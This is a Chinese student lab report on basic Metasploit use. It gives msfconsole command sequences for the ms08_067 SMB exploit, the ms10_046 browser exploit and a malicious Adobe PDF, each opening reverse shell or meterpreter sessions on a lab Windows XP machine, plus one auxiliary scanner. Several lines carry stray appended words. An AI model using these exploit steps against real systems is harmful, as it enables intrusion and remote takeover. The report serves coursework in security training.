20155207 實驗5 MSF基礎應用

20155207 實驗5 MSF基礎應用

基礎問題回答

  • 用本身的話解釋什麼是exploit,payload,encode
  • exploit:讓攻擊方式可以發揮做用的通道,更像是沒有子彈的槍,提供了攻擊方式
  • payload:載荷,真正具備攻擊能力的「子彈」
  • encode:編碼,使惡意代碼隱藏本身的屬性

實踐內容

本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:shell

  • 一個主動攻擊實踐,如ms08_067;windows

  • 一個針對瀏覽器的攻擊,如ms11_050;api

  • 一個針對客戶端的攻擊,如Adobe;瀏覽器

  • 成功應用任何一個輔助模塊。session

以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分。框架

  • 常見攻擊方式

程序存在漏洞,敵手透過漏洞發送惡意代碼控制被害主機。
惡意連接,其本意是攻擊ie,可是一旦不當心打開了這樣的連接就會被攻擊。
惡意程序假裝成常見的應用程序,以pdf爲例,惡意程序攻擊的是pdf,可是若是打開了這樣的應用,就會中招。tcp

  • msf原理

主要集成模塊,即metasploit框架中所使用的軟件代碼組件。主要包括:
exploit
payload 有效載荷,即攻擊所依附的主體
encode 改變shellcode形態,去掉壞字符
nop 空字符,做着陸區。
輔助模塊,即攻擊前提供目標準確信息以便發動更加精準的攻擊。學習

auxiliary編碼

  • msf指南

/usr/share/metasploit-framework/modules : 模塊目錄。
search + 指令:查找相關的指令位置。
use + 模塊名:使用模塊。
info + 模塊名:查看模塊使用說明。
armitage : 使用圖形化界面。
msfconsole -r +指令 :自動化執行。3d

實驗過程

主動攻擊:ms08_067漏洞攻擊

攻擊方:Kali Linux x64
靶機:Windows XP SP3(English)
關閉XP的全部防護,包括防火牆和殺毒軟件。
在Kali機啓動msfconsole,按照指導步驟輸入如下代碼:

use exploit/windows/smb/ms08_067_netapi   // 使用ms08_067漏洞攻擊方式
set payload generic/shell_reverse_tcp       // 以shell反向tcp鏈接爲有效載荷
set RHOST 192.168.129.134     // 受害者的IP
set LHOST 192.168.129.133     // 施害者的IP
set target 0      // 設置目標,0爲無差異攻擊

輸入exploit開始發動攻擊:

對瀏覽器攻擊:ms10_046漏洞攻擊
  • 先利用指令search ms10_046找到能夠攻擊的模塊
  • 咱們這裏選擇第一個,輸入命令use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
  • 輸入show payloads選擇攻擊載荷,咱們選擇generic/shell_reverse_tcp,輸入命令set payload generic/shell_reverse_tcp使用
  • 輸入命令show options查看配置設置並進行修改
  • 輸入exploit執行

  • 輸入exploit會出現一段URI:http://192.168.129.133:80/,同時控制檯進入監聽狀態
    受害者訪問這個神奇的URI,會彈出一個這樣的窗口:

  • 控制檯同受害者創建起一個鏈接:

  • 對配置進行修改,選用set payload windows/meterpreter/reverse_tcp,設置後查看結果,輸入sessions查看到一個ID號爲1的會話:

  • 輸入sessions查看有多少機器被反向連接到Kali機上(只有一個)。
    再次輸入sessions -i 1以控制受害者。

對Adobe的漏洞攻擊
  • 輸入search adobe查詢和adobe漏洞有關的模塊,輸入命令exploit/windows/fileformat/adobe_pdf_embedded_exe
  • 選擇攻擊載荷payload,輸入命令windows/meterpreter/reverse_tcp
  • 輸入命令set payload windows/meterpreter/reverse_tcp使用攻擊載荷
  • 配置滲透攻擊的各個選項
  • 輸入exploit執行查看結果

同時,在Kali的msfconsole上輸入如下命令開始監聽:

use exploit/multi/handler
set LHOST 192.168.129.133
set LPORT 4444
exploit

獲得結果:

輔助模塊的應用
  • 輸入命令show auxiliary查看輔助模塊,並挑選使用scanner/http/options
  • 輸入命令use scanner/http/options,輸入info查看信息
  • 設置參數

  • 輸入命令exploit執行

實驗總結與體會

此次實踐多了本身思考的過程,感受對msf的瞭解更多了一點,也更加能經過這種借鑑別人而後本身嘗試的方式學習到更多

相關文章
相關標籤/搜索